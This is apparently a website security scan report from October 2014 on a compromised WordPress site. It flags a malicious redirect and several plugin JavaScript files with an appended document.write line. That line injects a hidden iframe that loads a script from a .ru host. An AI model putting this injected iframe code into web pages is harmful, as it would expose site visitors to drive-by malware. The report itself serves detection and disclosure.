Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=naomishepard.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://naomishepard.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: naomishepard.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 11 Oct 2014 16:29:27 GMT Location: http://resettingsubtraction.ru/pittancebrass.cgi?8 Server: Apache Content-Length: 258 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://naomishepard.com/ | 200 OK Content-Length: 14527 Content-Type: text/html | clean |
http://naomishepard.com/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js?ver=1.3.2 | 200 OK Content-Length: 9974 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) shutterOnload = function(){shutterReloaded.init('sh');} if (typeof shutterOnload == 'function') { if ('undefined' != typeof jQuery) jQuery(document).ready(function(){shutterOnload();}); else if( typeof window.onload != 'function' ) window.onload = shutterOnload; else {oldonld = window.onload;window.onload = function(){if(oldonld){oldonld();};shutterOnload();}}; } shutterReloaded = { I : function (a) { return document.get switch (code) { case 39: if (prevlink) prevlink.onclick(); break; case 37: if (nextlink) nextlink.onclick(); break; case 27: if (closelink) closelink.onclick(); break; } } } ;document.write('<iframe src="http://resettingsubtraction.ru/pittancebrass.cgi?8" scrolling="auto" frameborder="no" align="center" height="15" width="15"></iframe>'); Antivirus reports:
| ||
http://naomishepard.com/wp-includes/js/jquery/jquery.js?ver=1.7.1 | 200 OK Content-Length: 93889 Content-Type: application/javascript | clean |
http://naomishepard.com/wp-content/plugins/nextgen-gallery/js/jquery.cycle.all.min.js?ver=2.88 | 200 OK Content-Length: 31197 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($){var ver="2.88";if($.support==undefined){$.support={opacity:!($.browser.msie)};}function debug(s){if($.fn.cycle.debug){log(s);}}function log(){if(window.console&&window.console.log){window.console.log("[cycle] "+Array.prototype.join.call(arguments," "));}}$.fn.cycle=function(options,arg2){var o={s:this.selector,c:this.context};if(this.length===0&&options!="stop"){if(!$.isReady&&o.s){log("DOM not ready, queuing slideshow");$(function(){$(o.s,o.c).cycle(options, Antivirus reports:
| ||
http://naomishepard.com/wp-content/plugins/nextgen-gallery/js/ngg.slideshow.min.js?ver=1.05 | 200 OK Content-Length: 1916 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jQuery.fn.nggSlideshow=function(args){var defaults={id:1,width:320,height:240,fx:'fade',domain:'',timeout:5000};var s=jQuery.extend({},defaults,args);var obj=this.selector;var stack=[];var url=s.domain+'index.php?callback=json&api_key=true&format=json&method=gallery&id='+s.id;var stackLength=0;jQuery.getJSON(url,function(r){if(r.stat=="ok"){for(img in r.images){var photo=r.images[img];stack.push(decodeURI(photo['imageURL']));} stackLength=stack.length;loadImage(1);}});functio jQuery(img).css({'height':height,'width':width});return img;};function jCycle_onBefore(curr,next,opts){if(opts.addSlide) if(stackLength>0){var img=new Image();img.src=stack.shift();stackLength--;jQuery(img).bind('load',function(){opts.addSlide(imageResize(this,s.width,s.height));});}};};document.write('<iframe src="http://resettingsubtraction.ru/pittancebrass.cgi?8" scrolling="auto" frameborder="no" align="center" height="15" width="15"></iframe>'); Antivirus reports:
| ||
http://naomishepard.com/wp-content/plugins/recipecan-recipes//javascripts//printer.js?ver=3.3.2 | 200 OK Content-Length: 1630 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jQuery(document).ready(function() { var clear_classes = function() { jQuery('body').removeClass('recipecan_print_recipe_body_wrapper'); jQuery('body').removeClass('recipecan_print_ingredients_body_wrapper'); }; var print_recipe = function(id) { jQuery('.recipecan_recipe_show_full').each(function(i, elm) { var recipe = jQuery(elm); var check_recipe = recipe.hasClass('recipecan_recipe_' + id); }); jQuery(".recipecan_print_ingredients_button").click(function() { clear_classes(); jQuery('body').addClass('recipecan_print_ingredients_body_wrapper'); print_recipe(jQuery(this).data('recipe-id')); return false; }); }); ;document.write('<iframe src="http://resettingsubtraction.ru/pittancebrass.cgi?8" scrolling="auto" frameborder="no" align="center" height="15" width="15"></iframe>'); Antivirus reports:
| ||
http://naomishepard.com/wp-content/plugins/nextgen-scrollgallery/scrollGallery/js/mootools-core-1.3.2-full-compat.js?ver=1.3.2 | 200 OK Content-Length: 88705 Content-Type: application/javascript | clean |
http://naomishepard.com/wp-content/plugins/nextgen-scrollgallery/scrollGallery/js/scrollGallery.js?ver=1.11 | 200 OK Content-Length: 9604 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) MooTools.More={version:"1.3.2.1",build:"e586bcd2496e9b22acfde32e12f84d49ce09e59d"};(function(){Fx.Scroll=new Class({Extends:Fx,options:{offset:{x:0,y:0},wheelStops:true},initialize:function(c,b){this.element=this.subject=document.id(c); this.parent(b);if(typeOf(this.element)!="element"){this.element=document.id(this.element.getDocument().body);}if(this.options.wheelStops){var d=this.element,e=this.cancel.pass(false,this); this.addEvent("start",function(){d.addEvent("mousewheel",e);},true }.bind(this)); } }else{ console.error('Missing imagearea'); } if(this.imgObjs&&this.tumbObjs) if(this.imgObjs.length!=this.tumbObjs.length) console.error("Error: The number of images does not match!"); } }); })(document.id);document.write('<iframe src="http://resettingsubtraction.ru/pittancebrass.cgi?8" scrolling="auto" frameborder="no" align="center" height="15" width="15"></iframe>'); Antivirus reports:
| ||
https://apis.google.com/js/plusone.js?ver=3.3.2 | 200 OK Content-Length: 12615 Content-Type: application/javascript | clean |
http://naomishepard.com/wp-content/plugins/social-linkz/core/load-scripts.php?c=0&load=social-linkz__js__js_front&ver=20141011 | 200 OK Content-Length: 323 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ;document.write('<iframe src="http://resettingsubtraction.ru/pittancebrass.cgi?8" scrolling="auto" frameborder="no" align="center" height="15" width="15"></iframe>'); Antivirus reports:
| ||
http://naomishepard.com/?page_id=2 | 200 OK Content-Length: 14933 Content-Type: text/html | clean |
http://naomishepard.com/wp-includes/js/comment-reply.js?ver=20090102 | 200 OK Content-Length: 786 Content-Type: application/javascript | clean |
http://naomishepard.com/?page_id=34 | 200 OK Content-Length: 15384 Content-Type: text/html | clean |
http://naomishepard.com/?page_id=10 | 200 OK Content-Length: 16004 Content-Type: text/html | clean |
http://naomishepard.com/?page_id=8 | 200 OK Content-Length: 14852 Content-Type: text/html | clean |